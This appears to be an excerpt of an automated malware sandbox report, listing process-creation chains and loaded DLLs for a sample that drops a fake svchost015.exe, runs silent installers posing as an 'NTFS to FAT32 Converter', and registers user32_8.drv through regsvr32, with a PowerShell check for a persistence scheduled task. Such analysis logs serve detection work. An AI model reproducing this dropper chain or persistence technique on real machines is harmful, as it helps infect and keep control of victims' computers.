                    Source: nK8noQeiXl.exe | String found in binary or memory: Cannot load driver. Please re-install it by executing Dokan.exe.
                    Source: unknown | Process created: C:\Users\user\Desktop\nK8noQeiXl.exe "C:\Users\user\Desktop\nK8noQeiXl.exe"
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe "C:\Users\user\Desktop\nK8noQeiXl.exe"
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Process created: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe "C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe"
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe | Process created: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp "C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp" /SL5="$60254,3470653,54272,C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Process created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe "C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe" -i
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Process created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe"
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe | Process created: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp "C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp" /SL5="$50036,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Process created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe | Process created: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp "C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp" /SL5="$20528,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp | Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv"
                    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Process created: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe "C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe"
                    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Windows\system32\config\systemprofile\AppData\Roaming\user32_8.drv"
                    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: textshaping.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: sxs.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: napinsp.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: wshbth.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: nlaapi.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: winrnr.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: sqlite3.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: iconcodecservice.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: sfc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
